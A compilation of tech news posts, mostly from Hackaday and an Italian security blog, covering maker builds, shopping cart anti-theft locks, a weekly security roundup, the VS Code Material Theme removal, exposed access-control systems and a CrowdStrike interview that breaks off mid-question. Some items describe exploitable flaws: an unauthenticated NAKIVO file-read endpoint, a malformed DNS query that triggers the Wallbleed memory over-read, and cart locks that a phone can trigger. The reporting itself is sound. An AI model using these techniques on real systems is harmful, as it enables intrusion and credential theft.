Cheap Fiber Optic Wand Toy Becomes Tiny Weird Display
If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.
The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.
[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.
We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.
youtube.com/embed/zz59e1wWyVc?…
[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]
Low-Resolution Fluid Simulation On An ESP32
Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.
This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.
There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.
We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.
youtube.com/embed/AwRup7wAijU?…
Tech in Plain Sight: Shopping Cart Locks
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.
And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.
The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.
A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.
Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.
Higher Tech
Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.
This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.
youtube.com/embed/PWZOeM5jdjg?…
Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.
youtube.com/embed/e7KzPQrzY-c?…
Where’s the Hack?
Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.
A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.
youtube.com/embed/fBICDODmCPI?…
Who Knew?
You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.
If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.
Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.
Hackaday Podcast Episode 310: Cyanotypes, Cyberdecks, and the Compass CNC
This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.
On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.
Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and savor at your leisure.
Where to Follow Hackaday Podcast
Places to follow Hackaday podcasts:
Episode 310 Show Notes:
News:
- Hackaday Europe 2025: Workshops And More Speakers
- KiCad 9 Moves Up In The Pro League
- We’re Hiring: Come Join Us!
What’s that Sound?
- Congrats to [Dakota] who drew lucky number 13 and a Hackaday Podcast t-shirt!
Interesting Hacks of the Week:
- Handheld Compass CNC Lets Teensy Do The Driving
- Cyanotype Prints On A Resin 3D Printer
- Open-Source Random Numbers
- 3D Print An Instant Camera
- Harvesting Water With High Voltage
- A Precisely Elegant Cyberdeck Handheld
Quick Hacks:
- Elliot’s Picks:
- Pico Gets A Speed Bump
- A Web-Based Graphics Editor For Tiny Screens
- To Test A (Smart) LED
- Import GPU: Python Programming With CUDA
- SHOUT For Smaller QR Codes
- Kristina’s Picks:
- 3D Print Yourself A Split Flap Display
- The Perfect Pi Pico Portable Computer
- Infill Injection Experiment Makes Stronger Parts
Can’t-Miss Articles:
- What Game Should Replace Doom As The Meme Port Of Choice?
- Keebin’ With Kristina: The One With All The Green Keyboards
hackaday.com/2025/02/28/hackad…
Lost Foam Aluminium Alloy Casting
[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it.
The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.
Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.
It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.
Aluminium casting is nothing new here, here’s a simple way to cast using a 3D printed pattern. But beware, casting aluminum can be hazardous, it does like to burn.
youtube.com/embed/zxFAhnvXzys?…
Thanks to [Chuck] for the tip!
This Week in Security: Malicious Themes, Crypto Heists, and Wallbleed
It’s usually not a good sign when your downloaded theme contains obfuscated code. Yes, we’re talking about the very popular Material Theme for VSCode. This one has a bit of a convoluted history. One of the authors wanted to make some money from all those downloads. The original Material Theme was yanked from the VSCode store, the source code (improperly) re-licensed as closed source, and replaced with freemium versions. And this week, those freemium versions have been pulled by Microsoft for containing malware.
Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.
The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?
Low-hanging Backups
NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.
So hence we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.
Apple Did What?
A couple weeks ago we talked about Apple and the UK government having a tussle over iCloud backup encryption. Apple has finally rolled out end-to-end encryption for those backups, and the UK’s Snooper’s Charter has been used to require Apple to add an encryption backdoor in that system. That’s problematic for multiple reasons, and Apple has opted to not quietly oblige the UK government. You may have seen headlines that Apple has pulled access to the new Advanced Data Protection (ADP) for UK users. This seems to be the next step of anti-compliance with the new UK rule.
The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.
Crypto Heist
We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.
It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.
And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.
Wallbleed
Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.
DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.
And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.
This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.
Bits and Bytes
It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!
How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.
Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.
Cybercrime contro gli sviluppatori VS Code: 9 milioni di utenti a rischio dopo la rimozione delle estensioni
Microsoft ha rimosso due estensioni popolari, Material Theme – Free e Material Theme Icons – Free, da Visual Studio Marketplace, in quanto sospettate di contenere codice dannoso.
In totale, queste estensioni sono state scaricate quasi 9 milioni di volte e ora gli utenti ricevono avvisi che indicano che le estensioni sono state disattivate automaticamente. Il loro editore, Mattia Astorino (alias equinusocio), ha diverse altre estensioni nel Visual Studio Marketplace, con un totale complessivo di oltre 13 milioni di installazioni.
Le informazioni secondo cui le estensioni potrebbero essere dannose provengono dai ricercatori di sicurezza informatica Amit Assaraf e Itay Kruk. Nel loro rapporto gli esperti hanno affermato di aver trovato codice sospetto nelle estensioni e di aver segnalato le loro scoperte a Microsoft.
I ricercatori sottolineano che il codice dannoso è stato iniettato nell’estensione tramite un aggiornamento, il che potrebbe indicare un attacco alla supply chain tramite una dipendenza o una compromissione dell’account dello sviluppatore.
Un altro campanello d’allarme era la presenza di codice JavaScript fortemente offuscato nei file release-notes.js.
“Microsoft ha rimosso entrambe le estensioni dal marketplace di VS Code e bannato il loro sviluppatore”,ha detto un dipendente Microsoft a YCombinator. — Uno dei membri della community ha effettuato un’analisi approfondita della sicurezza di queste estensioni e ha trovato molti “segnali d’allarme” che indicavano intenti malevoli, per poi segnalarcelo. I ricercatori di sicurezza Microsoft hanno confermato queste affermazioni e hanno trovato ulteriore codice sospetto. Abbiamo bandito l’editore da VS Marketplace, rimosso tutte le sue estensioni e disinstallato tutte le istanze di VS Code che eseguivano tali estensioni. Per essere chiari, la rimozione non ha nulla a che fare con il copyright o con la licenza, ma solo con potenziali intenti malevoli”. Microsoft ha promesso di pubblicare a breve informazioni più dettagliate sull’attività dannosa nel repository VSMarketplace su GitHub.
Lo sviluppatore dell’estensione, Mattia Astorino, ha risposto alle domande sui potenziali pericoli delle estensioni affermando che i problemi erano causati da una dipendenza obsoleta di sanity.io che “sembra essere compromessa”. Secondo lui, non c’è mai stato nulla di dannoso nel Material Theme e l’unico problema era una dipendenza obsoleta di sanity.io, “che veniva utilizzata per visualizzare le note di rilascio del CMS headless sanity”.
“Questa dipendenza esiste dal 2016 e ha superato con successo tutti i controlli, ma ora sembra compromessa. Nessuno di Microsoft ci ha contattato per rimuoverlo. Hanno appena distrutto tutto, causando problemi a milioni di utenti e causando il blocco di VSCode (sì, è colpa loro). Hanno rotto tutto senza mai chiederci spiegazioni, scrive Astorino. — Rimuovere la vecchia dipendenza è stato un lavoro da 30 secondi, ma sembra che sia così che funziona Microsoft. Inoltre, forniamo un file index.js offuscato che contiene tutti i comandi e la logica del tema. È offuscato perché l’estensione è ora closed source. Se la rimuovi, l’estensione continuerà a funzionare con i normali file JSON.”
Finché la situazione non sarà chiarita, si consiglia agli utenti di rimuovere i seguenti file da tutti i progetti:
• equinusocio.moxer-theme;
• equinusocio.vsc-material-theme;
• equinusocio.vsc-material-theme-icons;
• equinusocio.vsc-community-material-theme;
• equinusocio.moxer-icons.
L'articolo Cybercrime contro gli sviluppatori VS Code: 9 milioni di utenti a rischio dopo la rimozione delle estensioni proviene da il blog della sicurezza informatica.
Italia e Sicurezza Fisica a Rischio! 16.678 Dispositivi di Controllo Accessi Esposti Online
Se pensavate che la cybersecurity riguardasse solo i dati digitali, ecco una realtà ben più inquietante: 49.000 sistemi di controllo accessi (AMS) sono stati trovati esposti online, senza protezioni adeguate, mettendo a rischio la sicurezza fisica di edifici governativi, infrastrutture critiche e aziende in tutto il mondo.
Un’esposizione pericolosa
Secondo i ricercatori di Modat, questi AMS gestiscono l’accesso a strutture sensibili attraverso badge, sistemi biometrici e riconoscimento targhe. Tuttavia, le configurazioni errate di migliaia di dispositivi hanno lasciato le porte digitali spalancate, consentendo a chiunque di visualizzare e persino manipolare dati sensibili come:
- Nomi, email e numeri di telefono degli impiegati
- Dati biometrici come impronte digitali e riconoscimento facciale
- Fotografie personali
- Orari di lavoro e registri di accesso ai locali
E non è tutto: in alcuni casi, i ricercatori sono riusciti a modificare i record degli impiegati, creare utenti fittizi e alterare le credenziali di accesso, rendendo possibili scenari da film di spionaggio, in cui un attaccante potrebbe impedire l’ingresso a personale autorizzato o, peggio, concederlo a intrusi.
Italia in prima fila nell’esposizione
A livello globale, i numeri sono allarmanti, ma c’è un dato che fa riflettere ancora di più: il paese con il maggior numero di AMS esposti è l’Italia, con ben 16.678 dispositivi vulnerabili. Seguono il Messico (5.940) e il Vietnam (5.035), mentre negli Stati Uniti il numero si attesta a 1.966.
Danni oltre la sicurezza fisica
Oltre al rischio di intrusioni fisiche, l’accesso a questi dati apre la porta a minacce informatiche di alto livello, come attacchi di spear-phishing e social engineering. Conoscere il nome di un dipendente, la sua email e il suo orario di lavoro consente ai cybercriminali di orchestrare attacchi mirati con un’efficacia devastante.
Come proteggersi?
Alcuni vendor hanno dichiarato di essere al lavoro con i clienti per mitigare il problema, ma la lentezza nelle risposte è preoccupante, considerando la gravità della falla.
Le misure per arginare il problema esistono e dovrebbero essere adottate immediatamente:
- Spegnere l’accesso remoto: se il sistema non deve essere accessibile online, meglio rimuoverlo dalla rete pubblica.
- Firewall e VPN: gli AMS devono essere dietro un firewall e accessibili solo tramite VPN sicure.
- Cambio delle credenziali di default: sembra banale, ma molti sistemi sono ancora vulnerabili a brute-force perché usano username e password di fabbrica.
- MFA e aggiornamenti: implementare l’autenticazione multi-fattore e installare gli aggiornamenti di sicurezza più recenti.
- Crittografia e gestione dei dati: i dati biometrici e le informazioni personali devono essere sempre criptati, e i profili di ex-dipendenti devono essere cancellati per evitare usi fraudolenti.
Conclusione
Questa scoperta dei ricercatori di Modat evidenzia come la sicurezza fisica e informatica siano ormai inscindibili. Una vulnerabilità nel mondo digitale può avere conseguenze devastanti nel mondo reale. Se le aziende e le istituzioni non prenderanno provvedimenti immediati, le conseguenze potrebbero essere disastrose. La domanda è: quanti altri sistemi critici sono esposti senza che nessuno se ne accorga?
L'articolo Italia e Sicurezza Fisica a Rischio! 16.678 Dispositivi di Controllo Accessi Esposti Online proviene da il blog della sicurezza informatica.
Red Hot Cyber Intervista CrowdStrike sul Global Threat Report 2025
Nel panorama odierno della sicurezza informatica, CrowdStrike si distingue come uno dei leader più innovativi e influenti. Fondata nel 2011 da George Kurtz, Dmitri Alperovitch e Gregg Marston, l’azienda ha rapidamente guadagnato una reputazione per la sua capacità di rilevare e prevenire minacce informatiche avanzate. Con una combinazione di tecnologie all’avanguardia, intelligenza artificiale e un team di esperti di sicurezza, CrowdStrike è diventata una forza trainante nella protezione delle organizzazioni contro gli attacchi informatici.
In questa intervista a Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike, discuteremo delle sfide attuali che le aziende devono affrontare nel campo della sicurezza informatica e di come CrowdStrike sta rispondendo a queste minacce in continua evoluzione. Inoltre, parleremo del ruolo dell’intelligenza artificiale nella protezione dei dati e delle infrastrutture critiche.
La soluzione di maggior interesse fornita da CrowdStrike è la sua piattaforma Falcon, che utilizza una combinazione di analisi comportamentale e intelligenza artificiale per rilevare e rispondere alle minacce in tempo reale. Questa tecnologia ha rivoluzionato il modo in cui le aziende possono proteggere i loro sistemi, offrendo una visibilità senza precedenti sulle attività sospette e consentendo una risposta rapida ed efficace.
Luca non mancherà di discutere delle tendenze future nel campo della sicurezza informatica e di come CrowdStrike si sta preparando per affrontare le nuove sfide che di giorno in giorno emergono. Con l’aumento della digitalizzazione e l’espansione delle superfici di attacco, la capacità di adattarsi rapidamente e di innovare è cruciale per mantenere la sicurezza delle informazioni.
Accenneremo inoltre a come le attuali tensioni geopolitiche e conflitti globali, come gli scenari Ucraina/Russia, Cina/Taiwan stanno influenzando la natura e la frequenza degli attacchi cyber.
1-RHC: Il vostro Global Threat Report annuale (GTR 2025) riassume l’analisi del team di intelligence di CrowdStrike effettuata nel corso del 2024 e descrive temi, tendenze ed eventi di rilievo nel panorama delle minacce informatiche. Questo report annuale include anche valutazioni anticipate delle minacce per aiutare le organizzazioni a prepararsi e a proteggersi durante il prossimo anno. Potrebbe condividere con noi alcune delle principali tendenze e minacce emerse dal report di quest’anno e come le aziende possono utilizzare queste informazioni per migliorare la propria postura digitale per il futuro?
Luca Nilo Livrieri: Il report evidenzia alcune tendenze significative in relazione alle tipologie di attacchi: il 79% degli attacchi rilevati da CrowdStrike nel 2024 risulta aver operato senza malware, utilizzando cioè strumenti legittimi già presenti nell’ambiente della vittima, e rendendo quasi impossibile distinguere l’attività malevole. Si parla quindi di intrusioni interattive o “hands-on”. Un dato altrettanto interessante emerso è l’aumento di attacchi che sfruttano tecniche di social engineering – vishing e call back phishing su tutte. Tenendo conto di queste tendenze, le aziende devono focalizzarsi su diversi aspetti: innanzitutto su una protezione delle identità, che vengono spesso usate dagli attaccanti come initial access, e poi su un rafforzamento delle soluzioni di rilevamento in real time basate su behaviour e, infine, sull’utilizzo di soluzioni di IA per aumentare la velocità della detection, investigation e response. Dal punto di vista organizzativo è necessario formare il personale a difendersi dal social engineering, implementare workflow automatizzati di remediation e sviluppare capacità di threat hinting a 360°su tutto il perimetro aziendale
2-RHC: Quali sono i trend nello eCrime? Quanto sono diffusi attacchi tramite malware rispetto ad attacchi mirati alle identità che non prevedano l’utilizzo di malware e/o includano l’uso di social engineering potenziato eventualmente dall’Intelligenza Artificiale Generativa (GenAI) (come ad esempio con video DeepFake)?
Luca Nilo Livrieri: Secondo l’analisi che abbiamo svolto nel 2024, come accennato nella risposta alla precedente domanda, vi è stata un’alta percentuale (79%) di attacchi senza utilizzo di malware e basati su tecniche “hands-on-keyboard” e strumenti legittimi: si preferiscono quindi metodi “fileless” e living-off-the-land. Gli attacchi alle identità risultano i più frequenti, essendo ormai da anni un trend in crescita. A tal proposito si è registrato, ad esempio, un aumento del 442% negli attacchi di vishing nella seconda metà del 2024 e un crescente utilizzo di GenAI per la creazione di contenuti più convincenti a supporto nelle operazioni di social engineering.
L’utilizzo dell’intelligenza artificiale ha supportato un’evoluzione delle tattiche dal phishing tradizionale verso tecniche alternative (vishing e callback) con un aumento dell’efficacia significativo, se in passato la classica email di phishing aveva un’efficacia del 12%, oggi la stessa email generata con l’AI ha un’efficacia del 54%.
3-RHC: Kevin Mitnick, noto come “il Condor”, è stato uno degli hacker più famosi e abili della storia. La sua carriera di hacking iniziò negli anni ’80, quando si dedicò al phreaking, ovvero l’hacking dei sistemi telefonici. Mitnick era un maestro nell’arte dell’ingegneria sociale, utilizzando tecniche di manipolazione psicologica per ottenere informazioni riservate direttamente dalle persone al telefono.
Quanto è ancora importante per le organizzazioni educare gli utenti a riconoscere tentativi di attacco tramite di voice phishing (vishing)?
Luca Nilo Livrieri: L’eredità delle tecniche di social engineering di Kevin Mitnick è più rilevante che mai nel panorama attuale delle minacce informatiche. L’allarmante aumento negli attacchi di vishing (del 442%), già citato, ha dimostrato come questa tecnica tradizionale si sia evoluta e rafforzata grazie alle nuove tecnologie.
Le tecniche di manipolazione psicologica che Mitnick utilizzava negli anni ’80 sono state potenziate dall’intelligenza artificiale e dalle tecnologie di clonazione vocale, rendendo gli attacchi di vishing significativamente più convincenti e difficili da identificare. Gli attaccanti moderni sfruttano ancora le stesse vulnerabilità umane – urgenza, autorità e fiducia – ma avendo a disposizione strumenti molto più sofisticati.
L’evoluzione tecnologica ha permesso di automatizzare e scalare questi attacchi, integrandoli con altri vettori di minaccia. La capacità di generare “voci clone” realistiche e di orchestrare attacchi su larga scala rende senza dubbio il vishing una minaccia ancora più seria rispetto al passato. É fondamentale per le organizzazioni proteggersi investendo nella formazione continua del personale, conducendo simulazioni realistiche e assicurando un aggiornamento costante della consapevolezza sulle nuove tecniche di attacco. Questa formazione deve essere supportata da solidi controlli tecnici, come l’autenticazione multi-fattore e protocolli di verifica delle richieste sensibili. Le organizzazioni devono inoltre stabilire procedure chiare e verificabili per la gestione delle richieste sensibili, definendo canali di comunicazione sicuri e implementando sistemi efficaci per il reporting di tentativi sospetti. La combinazione tra consapevolezza umana e controlli tecnici rimane la migliore difesa contro il vishing moderno, proprio come ai tempi di Mitnick, purché tenga conto della necessità di strumenti e procedure specificamente adattati alle sfide contemporanee
4-RHC: Sempre in merito ai trend, pensando alle vittime dello eCrime, potrebbe indicarci delle statistiche riguardo i settori verticali più significativi nelle aree geografiche più importanti?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un quadro complesso e preoccupante della distribuzione degli attacchi eCrime a livello globale e settoriale. L’analisi mostra come gli attori delle minacce abbiano intensificato significativamente le loro attività, con un’attenzione particolare al settore finanziario, che ha subito un drammatico aumento degli attacchi, specialmente da parte di gruppi legati alla Cina – con incrementi che hanno raggiunto il 200-300%.
A livello globale il Nord America continua a essere un obiettivo primario, particolarmente per quanto riguarda le istituzioni finanziarie e le aziende tecnologiche. L’Europa ha visto una concentrazione di attacchi diretti al settore manifatturiero e ai servizi finanziari, mentre nella regione Asia-Pacifico gli attaccanti hanno mostrato un interesse particolare per il settore industriale e manifatturiero.
Il settore sanitario e le infrastrutture critiche rimangono obiettivi di elevato interesse strategico a livello globale, con un’intensificazione degli attacchi particolarmente evidente nelle economie più sviluppate.
5-RHC: Oggi, la Cina è una delle principali economie mondiali, con un forte settore manifatturiero orientato all’esportazione. Qual è oggi la portata di operazioni di spionaggio informatico da parte di attori cinesi? La maturità degli attaccanti cinesi è aumentata in modo proporzionato all’aumento del loro potere economico?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un incremento sostanziale delle operazioni cyber cinesi, con un aumento complessivo del 150% trasversale su tutti i settori, con punte fino al 200-300% in ambiti strategicamente cruciali come il settore finanziario, mediatico, manifatturiero e ingegneristico-industriale. Questa escalation nelle attività di cyber-spionaggio riflette chiaramente l’ambizione cinese di consolidare la propria posizione di leadership tecnologica e industriale a livello globale. La maturazione delle capacità offensive cinesi è particolarmente evidente nell’evoluzione delle tattiche operative: gli attaccanti hanno abbandonato approcci più tradizionali e facilmente rilevabili in favore di metodologie più sofisticate e difficili da attribuire. Particolarmente significativa è la loro capacità di condurre operazioni stealth che evitano l’uso di malware, a favore di tecniche più sottili che sfruttano le vulnerabilità della supply chain e garantiscono una persistenza duratura nei sistemi compromessi. Questa evoluzione tecnica dimostra un chiaro allineamento con gli obiettivi strategici nazionali cinesi, come definiti nei piani quinquennali e nelle iniziative di sviluppo tecnologico del paese. La sofisticazione crescente degli attacchi cinesi rispecchia gli ingenti investimenti del paese in tecnologia e innovazione, creando una sinergia preoccupante tra potere economico e capacità cyber offensive. Per le organizzazioni globali, specialmente quelle operanti in settori strategici o quelle per le quali la proprietà intellettuale risulta un asset particolarmente significativo, questa evoluzione rappresenta una sfida crescente che richiede un approccio difensivo sempre più sofisticato e stratificato.
La minaccia rappresentata dagli attori cinesi non è più solo una questione di sicurezza informatica, ma si inserisce in un più ampio contesto di competizione geopolitica e tecnologica globale, richiedendo una risposta coordinata che coinvolga sia aspetti tecnici che strategici.
6-RHC: Considerando che, in base al vostro report GTR 2025, almeno cinque diversi threat actors state-sponsored legati alla Cina, come ad esempio APT41 (a.k.a. Wicked PANDA), utilizzano ora il malware KEYPLUG anche offuscando le loro attività attraverso reti ORB (Operational Relay Box), quali sono le principali caratteristiche di questo malware che lo rendono così versatile e resistente, e quali strategie possono adottare le organizzazioni per rilevare e mitigare tali minacce?
